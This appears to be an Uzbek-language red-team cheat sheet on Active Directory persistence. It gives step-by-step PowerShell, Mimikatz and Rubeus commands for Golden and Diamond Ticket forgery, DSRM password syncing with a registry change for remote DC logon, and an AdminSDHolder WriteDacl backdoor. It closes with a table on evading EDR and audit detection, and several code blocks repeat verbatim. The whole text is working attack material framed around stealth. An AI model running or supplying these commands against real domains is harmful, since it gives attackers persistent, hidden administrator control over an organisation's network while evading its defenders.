Persistence
Persist OPSEC
Golden/Diamond/Silver Ticket, DSRM, AdminSDHolder
Golden Ticket (TGT Forgery)
Buzilgan krbtgt accounti yordamida TGT qalbakilashtirish — doimiy domain kirish imkoniyati.
OPSEC: RC4 (/rc4) ishlatmang va 10 yillik lifetime yaratmang. AES-256 va default 10 soatlik lifetime ishlating.
PowerShellPowerShell
# 1-qadam: DCSync orqali krbtgt AES-256 kalitini olish
lsadump::dcsync /domain:domain.local /user:krbtgt
# 2-qadam: Domain SID ni native aniqlash
Get-DomainSID
# 3-qadam: AES-256 Golden Ticket yaratib inject qilish
.\Rubeus.exe golden /aes256:KRBTGT_AES256_KEY /domain:domain.local `
/sid:S-1-5-21-XXXXXXX /user:Administrator /id:500 /ptt
lsadump::dcsync /domain:domain.local /user:krbtgt
# 2-qadam: Domain SID ni native aniqlash
Get-DomainSID
# 3-qadam: AES-256 Golden Ticket yaratib inject qilish
.\Rubeus.exe golden /aes256:KRBTGT_AES256_KEY /domain:domain.local `
/sid:S-1-5-21-XXXXXXX /user:Administrator /id:500 /ptt
Diamond Ticket (TGT Modification)
Noldan qalbakilashtirish o'rniga legitimly berilgan TGT ni o'zgartirish. PAC to'g'ri shifrlangan bo'ladi — DC lar uchun 100% autentik ko'rinadi.
Diamond Ticket eng stealth persistance usuli — legitimate Kerberos traffic bilan amalda ajratib bo'lmaydi.
PowerShellPowerShell
# Legitimate TGT so'rab, krbtgt AES kalit bilan PAC ni o'zgartirish va inject qilish
.\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator `
/ticketuserid:500 /groups:512 /krbkey:KRBTGT_AES256_KEY /ptt
.\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator `
/ticketuserid:500 /groups:512 /krbkey:KRBTGT_AES256_KEY /ptt
DSRM Persistence (Stealth alternativ)
Directory Services Restore Mode (DSRM) mahalliy administrator parolini domain account bilan sinxronlash — ticket qalbakilashtirmasdan DC ga doimiy remote kirish.
DSRM hisob qaydnomalari AD replikatsiyasiga kirmaydi — BloodHound va standart AD auditda ko'rinmaydi.
PowerShellPowerShell
# 1-qadam: DSRM parolini krbtgt bilan sinxronlash (DC da bajaring)
Invoke-Mimikatz -Command '"lsadump::setntlm /server:localhost /user:Administrator /sync:krbtgt"'
# 2-qadam: Registry da tarmoq orqali DSRM loginni yoqish
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" `
-Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
# 3-qadam: WMI yoki PSRemoting orqali DC ga remote kirish
sekurlsa::pth /domain:TargetDC /user:Administrator /ntlm:KRBTGT_NTLM_HASH /run:cmd.exe
Invoke-Mimikatz -Command '"lsadump::setntlm /server:localhost /user:Administrator /sync:krbtgt"'
# 2-qadam: Registry da tarmoq orqali DSRM loginni yoqish
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" `
-Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
# 3-qadam: WMI yoki PSRemoting orqali DC ga remote kirish
sekurlsa::pth /domain:TargetDC /user:Administrator /ntlm:KRBTGT_NTLM_HASH /run:cmd.exe
AdminSDHolder Abuse (SDProp)
Himoyalangan guruhlar (Domain Admins, Enterprise Admins) da doimiy ACL entry qoldirish. SDProp jarayoni har 60 daqiqada AdminSDHolder ACL ni barcha himoyalangan foydalanuvchilarga bosadi.
GenericAll bermaslik — GenericWrite yoki WriteDACL yashirinroq. AD audit paytida kamroq shubhali ko'rinadi.
PowerShellPowerShell
# Yashirin low-privilege foydalanuvchiga doimiy WriteDACL huquqi qo'shish
Add-DomainObjectAcl `
-TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" `
-PrincipalIdentity backdoor_user -Rights WriteDacl
Add-DomainObjectAcl `
-TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" `
-PrincipalIdentity backdoor_user -Rights WriteDacl
OPSEC Notes & Telemetry Matrix
| Texnika | Risk | EDR Telemetry | OPSEC Yechim |
|---|---|---|---|
| Golden Ticket (RC4) | Critical | TGS-REQ yo'q. RC4 (0x17). Anormal lifetime. | AES-256. Default 10 soat lifetime. |
| Golden Ticket (AES) | Medium | TGS-REQ yo'q, lekin encryption oddiy ko'rinadi. | Normal lifetime ni qo'llang. |
| Diamond Ticket | Very Low | Legitimate Kerberos traffic bilan aralashib ketadi. | Eng yashirin persistance usuli. |
| Silver Ticket | Low | DC loglarida hech narsa yo'q. | Faqat target mashinada local detection. |
| DSRM Sync | Very Low | Registry o'zgarish (DsrmAdminLogonBehavior). | Setup dan keyin oddiy NTLM/Kerberos auth. |
| AdminSDHolder | Medium | Event 5136 (Directory Service Changes). | BloodHound audit qilsa ko'rinishi mumkin. |